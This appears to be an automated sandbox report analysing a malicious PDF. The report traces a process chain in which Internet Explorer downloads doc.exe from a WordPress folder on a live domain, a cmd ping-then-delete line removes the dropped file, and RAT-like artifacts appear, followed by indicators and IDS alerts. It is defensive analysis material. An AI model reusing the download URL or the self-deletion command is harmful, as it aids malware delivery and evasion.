AcroRd32.exe (PID: 3036 cmdline: 'C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe' --type=renderer /prefetch:1 'C:\Users\user\Desktop\aaa.pdf' MD5: C282A6792FB3C2E4CF37082891A5D69C)

RdrCEF.exe (PID: 3632 cmdline: 'C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --backgroundcolor=16448250 MD5: 254D4BE8CD7953E7AD7CC37FE82BCF35)

RdrCEF.exe (PID: 2736 cmdline: 'C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --type=renderer --disable-3d-apis --disable-databases --disable-direct-npapi-requests --disable-file-system --disable-notifications --disable-shared-workers --lang=en-US --lang=en-US --log-severity=disable --product-version='ReaderServices/15.16.20039 Chrome/45.0.2454.85' --enable-pinch --device-scale-factor=1 --enable-delegated-renderer --num-raster-threads=2 --gpu-rasterization-msaa-sample-count=8 --content-image-texture-target=3553 --video-image-texture-target=3553 --disable-accelerated-video-decode --disable-webrtc-hw-encoding --disable-gpu-compositing --channel='3632.0.1828675925\933854480' --allow-no-sandbox-job --font-cache-shared-handle=1260 /prefetch:673131151 MD5: 254D4BE8CD7953E7AD7CC37FE82BCF35)

RdrCEF.exe (PID: 3644 cmdline: 'C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --type=renderer --disable-3d-apis --disable-databases --disable-direct-npapi-requests --disable-file-system --disable-notifications --disable-shared-workers --lang=en-US --lang=en-US --log-severity=disable --product-version='ReaderServices/15.16.20039 Chrome/45.0.2454.85' --enable-pinch --device-scale-factor=1 --enable-delegated-renderer --num-raster-threads=2 --gpu-rasterization-msaa-sample-count=8 --content-image-texture-target=3553 --video-image-texture-target=3553 --disable-accelerated-video-decode --disable-webrtc-hw-encoding --disable-gpu-compositing --channel='3632.1.1650676039\414440677' --allow-no-sandbox-job --font-cache-shared-handle=1756 /prefetch:673131151 MD5: 254D4BE8CD7953E7AD7CC37FE82BCF35)

iexplore.exe (PID: 920 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' http://zwangerschapsyogaamsterdamwest.nl/wp-user/doc.exe MD5: E7CD04555F47651B79A50DBA6148019C)

iexplore.exe (PID: 876 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' SCODEF:920 CREDAT:82945 /prefetch:2 MD5: E7CD04555F47651B79A50DBA6148019C)

doc.exe (PID: 3440 cmdline: 'C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe' MD5: 4DA1C29C6D3E91509FBE0D328118257D)

doc.exe (PID: 1952 cmdline: 'C:\Users\user\AppData\Local\Temp\doc\doc.exe' MD5: 4DA1C29C6D3E91509FBE0D328118257D)

cmd.exe (PID: 3772 cmdline: 'C:\Windows\System32\cmd.exe' /C ping 1.1.1.1 -n 1 -w 1000 > Nul & Del 'C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe' MD5: 7DB6A5CEEAC1CB15CF78552794B3DB31)

conhost.exe (PID: 568 cmdline: C:\Windows\system32\conhost.exe 0x4 MD5: 66CC0EE1A55D150A84EF8D91D18B7C55)

PING.EXE (PID: 1280 cmdline: ping 1.1.1.1 -n 1 -w 1000 MD5: 1CA1179CA1AA9FF17DED960E52794F0A)

cleanup

Created / dropped Files

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages
File Type:	empty
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
MD5:	D41D8CD98F00B204E9800998ECF8427E
SHA1:	DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
SHA-256:	E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
SHA-512:	CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
Malicious:	false
Reputation:	high, very likely benign file

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journal
File Type:	empty
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
MD5:	D41D8CD98F00B204E9800998ECF8427E
SHA1:	DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
SHA-256:	E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
SHA-512:	CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
Malicious:	false
Reputation:	high, very likely benign file

C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\data_1
File Type:	empty
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
MD5:	D41D8CD98F00B204E9800998ECF8427E
SHA1:	DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
SHA-256:	E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
SHA-512:	CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
Malicious:	false
Reputation:	high, very likely benign file

C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\doc.exe.log
File Type:	empty
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
MD5:	D41D8CD98F00B204E9800998ECF8427E
SHA1:	DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
SHA-256:	E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
SHA-512:	CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
Malicious:	false
Reputation:	high, very likely benign file

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\IECompatData\iecompatdata.xml
File Type:	empty
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
MD5:	D41D8CD98F00B204E9800998ECF8427E
SHA1:	DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
SHA-256:	E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
SHA-512:	CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
Malicious:	false
Reputation:	high, very likely benign file

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{C91FF9B7-096C-11E8-838B-B808CF88133C}.dat
File Type:	empty
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
MD5:	D41D8CD98F00B204E9800998ECF8427E
SHA1:	DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
SHA-256:	E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
SHA-512:	CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
Malicious:	false
Reputation:	high, very likely benign file

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{C91FF9B9-096C-11E8-838B-B808CF88133C}.dat
File Type:	empty
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
MD5:	D41D8CD98F00B204E9800998ECF8427E
SHA1:	DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
SHA-256:	E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
SHA-512:	CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
Malicious:	false
Reputation:	high, very likely benign file

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-17529550060\msapplication.xml
File Type:	empty
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
MD5:	D41D8CD98F00B204E9800998ECF8427E
SHA1:	DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
SHA-256:	E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
SHA-512:	CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
Malicious:	false
Reputation:	high, very likely benign file

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-18270793970\msapplication.xml
File Type:	empty
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
MD5:	D41D8CD98F00B204E9800998ECF8427E
SHA1:	DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
SHA-256:	E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
SHA-512:	CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
Malicious:	false
Reputation:	high, very likely benign file

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-21706820\msapplication.xml
File Type:	empty
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
MD5:	D41D8CD98F00B204E9800998ECF8427E
SHA1:	DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
SHA-256:	E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
SHA-512:	CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
Malicious:	false
Reputation:	high, very likely benign file

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-4759708130\msapplication.xml
File Type:	empty
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
MD5:	D41D8CD98F00B204E9800998ECF8427E
SHA1:	DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
SHA-256:	E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
SHA-512:	CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
Malicious:	false
Reputation:	high, very likely benign file

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-6757900\msapplication.xml
File Type:	empty
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
MD5:	D41D8CD98F00B204E9800998ECF8427E
SHA1:	DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
SHA-256:	E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
SHA-512:	CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
Malicious:	false
Reputation:	high, very likely benign file

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-8760897390\msapplication.xml
File Type:	empty
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
MD5:	D41D8CD98F00B204E9800998ECF8427E
SHA1:	DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
SHA-256:	E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
SHA-512:	CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
Malicious:	false
Reputation:	high, very likely benign file

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20259167780\msapplication.xml
File Type:	empty
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
MD5:	D41D8CD98F00B204E9800998ECF8427E
SHA1:	DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
SHA-256:	E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
SHA-512:	CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
Malicious:	false
Reputation:	high, very likely benign file

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20332743330\msapplication.xml
File Type:	empty
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
MD5:	D41D8CD98F00B204E9800998ECF8427E
SHA1:	DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
SHA-256:	E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
SHA-512:	CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
Malicious:	false
Reputation:	high, very likely benign file

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin8215062560\msapplication.xml
File Type:	empty
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
MD5:	D41D8CD98F00B204E9800998ECF8427E
SHA1:	DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
SHA-256:	E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
SHA-512:	CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
Malicious:	false
Reputation:	high, very likely benign file

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\VersionManager\ver1ABF.tmp
File Type:	empty
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
MD5:	D41D8CD98F00B204E9800998ECF8427E
SHA1:	DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
SHA-256:	E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
SHA-512:	CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
Malicious:	false

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\VersionManager\ver2697.tmp
File Type:	empty
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
MD5:	D41D8CD98F00B204E9800998ECF8427E
SHA1:	DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
SHA-256:	E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
SHA-512:	CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
Malicious:	false

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe.t4d5zp4.partial
File Type:	empty
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
MD5:	D41D8CD98F00B204E9800998ECF8427E
SHA1:	DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
SHA-256:	E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
SHA-512:	CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
Malicious:	true

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe.t4d5zp4.partial:Zone.Identifier
File Type:	empty
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
MD5:	D41D8CD98F00B204E9800998ECF8427E
SHA1:	DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
SHA-256:	E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
SHA-512:	CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
Malicious:	true

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe:Zone.Identifier
File Type:	empty
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
MD5:	D41D8CD98F00B204E9800998ECF8427E
SHA1:	DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
SHA-256:	E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
SHA-512:	CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
Malicious:	true

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W8M6OQAW\doc[1].exe
File Type:	empty
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
MD5:	D41D8CD98F00B204E9800998ECF8427E
SHA1:	DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
SHA-256:	E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
SHA-512:	CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
Malicious:	false

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W8M6OQAW\iecompatviewlist[1].xml
File Type:	empty
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
MD5:	D41D8CD98F00B204E9800998ECF8427E
SHA1:	DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
SHA-256:	E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
SHA-512:	CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
Malicious:	false

C:\Users\user\AppData\Local\Temp\doc\doc.exe
File Type:	empty
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
MD5:	D41D8CD98F00B204E9800998ECF8427E
SHA1:	DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
SHA-256:	E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
SHA-512:	CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
Malicious:	true

C:\Users\user\AppData\Local\Temp\~DF4DFE5411DBEE02FD.TMP
File Type:	empty
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
MD5:	D41D8CD98F00B204E9800998ECF8427E
SHA1:	DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
SHA-256:	E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
SHA-512:	CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
Malicious:	false

C:\Users\user\AppData\Local\Temp\~DFC8AB8E09E7973EC3.TMP
File Type:	empty
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
MD5:	D41D8CD98F00B204E9800998ECF8427E
SHA1:	DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
SHA-256:	E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
SHA-512:	CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
Malicious:	false

C:\Users\user\AppData\Roaming\Imminent\Logs\03-02-2018
File Type:	empty
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
MD5:	D41D8CD98F00B204E9800998ECF8427E
SHA1:	DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
SHA-256:	E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
SHA-512:	CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
Malicious:	false

C:\Users\user\AppData\Roaming\williams.exe
File Type:	empty
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
MD5:	D41D8CD98F00B204E9800998ECF8427E
SHA1:	DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
SHA-256:	E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
SHA-512:	CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
Malicious:	false

C:\Windows\assembly\Desktop.ini
File Type:	empty
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
MD5:	D41D8CD98F00B204E9800998ECF8427E
SHA1:	DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
SHA-256:	E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
SHA-512:	CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
Malicious:	false

\Device\Null
File Type:	empty
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
MD5:	D41D8CD98F00B204E9800998ECF8427E
SHA1:	DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
SHA-256:	E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
SHA-512:	CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
Malicious:	false

\chrome.3632.0.182867592
File Type:	data
Size (bytes):	7552
Entropy (8bit):	5.022900957969773
Encrypted:	false
MD5:	B8C670A62496396D2CAAE8DB80FD4984
SHA1:	CA2B5EC37B1FF4534056732CA447AC41F8E138D4
SHA-256:	D651E8F8BB345C1E8BDA432EEB15E564606506028D46F4AFE650A843F3263943
SHA-512:	7AA6140D64EDD126522D09905F32E4753035B7BDAAD647FA46B2FF798CCC66E12BA8D0DD4C56A6DB5A2DC47060D202E33F57235D9773A5509541EDD2276F0411
Malicious:	false

\chrome.3632.1.165067603
File Type:	empty
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
MD5:	D41D8CD98F00B204E9800998ECF8427E
SHA1:	DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
SHA-256:	E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
SHA-512:	CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
Malicious:	false

\com.adobe.reader.rna.user.0
File Type:	empty
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
MD5:	D41D8CD98F00B204E9800998ECF8427E
SHA1:	DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
SHA-256:	E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
SHA-512:	CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
Malicious:	false

\com.adobe.reader.rna.fe4
File Type:	empty
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
MD5:	D41D8CD98F00B204E9800998ECF8427E
SHA1:	DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
SHA-256:	E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
SHA-512:	CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
Malicious:	false

\mojo.3632.896.11330774064440410962
File Type:	empty
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
MD5:	D41D8CD98F00B204E9800998ECF8427E
SHA1:	DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
SHA-256:	E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
SHA-512:	CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
Malicious:	false

\mojo.3632.896.8485368338976744871
File Type:	data
Size (bytes):	224
Entropy (8bit):	1.0814558124904918
Encrypted:	false
MD5:	BFEFB3F9D9F41C32C3894E5F77E3FAF3
SHA1:	375CB06EEE441F03BA01520B475F13B1E46C2AC7
SHA-256:	E56EFB00C617D5E5FD8103150FC58B7754140CFBBD00185D38C307B0DA8FF634
SHA-512:	75399F736AD1E1F1497178D438CAA24EE49130508CBCD913063E79A695FD4A297F86E3B08AD7BE2ECCE53D973349F1A2DE09E7A0D97B9AB5AE347C338948F745
Malicious:	false

unknown
File Type:	empty
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
MD5:	D41D8CD98F00B204E9800998ECF8427E
SHA1:	DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
SHA-256:	E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
SHA-512:	CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
Malicious:	true

Contacted Domains/Contacted IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection
zwangerschapsyogaamsterdamwest.nl	192.185.103.35	true	true	0%, virustotal, Browse

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

IP	Country	ASN	ASN Name	Malicious
192.185.103.35	United States	20013	CYRUSONE-CyrusOneLLCUS	true
8.8.8.8	United States	15169	GOOGLE-GoogleIncUS	false
1.1.1.1	Australia	unknown	unknown	true
213.183.58.7	Lithuania	56630	MELBICOM-EU-ASNL	true

Static File Info

General
File type:	PDF document, version 1.5
Entropy (8bit):	7.520126750968663
TrID:	Adobe Portable Document Format (5005/1) 76.94% Java Script embedded in Visual Basic Script (1500/0) 23.06%
File name:	aaa.pdf
File size:	23832
MD5:	37c68a5704581befbb08df5ea3a9c528
SHA1:	69d632cb9e4aefb6a92daf1835385f3a6548a2a0
SHA256:	7691b7c91835a65161798d1adfd68ea264926f579dabd8325a363b12d26e9e90
SHA512:	bf519dc451f07438f009ccc02f28f5047a9fc245d2e8be2f4d22a6b563cc85da0c03b0756772bb84b2223417efecd07d7442578415938216437f75cd9fa6da48
File Content Preview:	%PDF-1.5..4 0 obj..<</Type /Page/Parent 3 0 R/Contents 5 0 R/MediaBox [0 0 612 792]/Resources<</XObject<</X1 7 0 R>>>>/Group <</Type/Group/S/Transparency/CS/DeviceRGB>>/Annots[6 0 R ]>>..endobj..5 0 obj..<</Length 8 0 R>>stream..1 0 0 -1 0 792 cm q 1 0 0

File Icon

Static PDF Info

General
Header:	%PDF-1.5
Total Entropy:	7.520127
Total Bytes:	23832
Stream Entropy:	7.532536
Stream Bytes:	22093
Entropy outside Streams:	5.515339
Bytes outside Streams:	1739
Number of EOF found:	2
Bytes after EOF:

Keywords Statistics

Name	Count
obj	14
endobj	14
stream	5
endstream	5
xref	0
trailer	0
startxref	2
/Page	1
/Encrypt	0
/ObjStm	0
/URI	2
/JS	0
/JavaScript	0
/AA	0
/OpenAction	0
/AcroForm	0
/JBIG2Decode	0
/RichMedia	0
/Launch	0
/EmbeddedFile	0

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
02/03/18-21:33:23.623479	TCP	2022239	ET TROJAN EXE Download Request To Wordpress Folder Likely Malicious	49751	80	192.168.1.72	192.185.103.35
02/03/18-21:33:23.623479	TCP	2021697	ET TROJAN EXE Download Request To Wordpress Folder Likely Malicious	49751	80	192.168.1.72	192.185.103.35

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 3, 2018 21:32:10.561108112 CET	62465	53	192.168.1.72	8.8.8.8
Feb 3, 2018 21:32:11.567994118 CET	62465	53	192.168.1.72	8.8.8.8
Feb 3, 2018 21:32:12.571824074 CET	62465	53	192.168.1.72	8.8.8.8
Feb 3, 2018 21:32:14.582293034 CET	62465	53	192.168.1.72	8.8.8.8
Feb 3, 2018 21:32:18.602766991 CET	62465	53	192.168.1.72	8.8.8.8
Feb 3, 2018 21:32:20.473094940 CET	53	62465	8.8.8.8	192.168.1.72
Feb 3, 2018 21:32:20.611568928 CET	53	62465	8.8.8.8	192.168.1.72
Feb 3, 2018 21:32:20.611646891 CET	53	62465	8.8.8.8	192.168.1.72
Feb 3, 2018 21:32:20.611680984 CET	53	62465	8.8.8.8	192.168.1.72
Feb 3, 2018 21:32:20.611707926 CET	53	62465	8.8.8.8	192.168.1.72
Feb 3, 2018 21:32:27.988158941 CET	65509	53	192.168.1.72	8.8.8.8
Feb 3, 2018 21:32:28.871850014 CET	53	65509	8.8.8.8	192.168.1.72
Feb 3, 2018 21:32:56.336441040 CET	54798	53	192.168.1.72	8.8.8.8
Feb 3, 2018 21:32:57.384031057 CET	54798	53	192.168.1.72	8.8.8.8
Feb 3, 2018 21:32:57.650475979 CET	53	54798	8.8.8.8	192.168.1.72
Feb 3, 2018 21:32:58.414820910 CET	53	54798	8.8.8.8	192.168.1.72
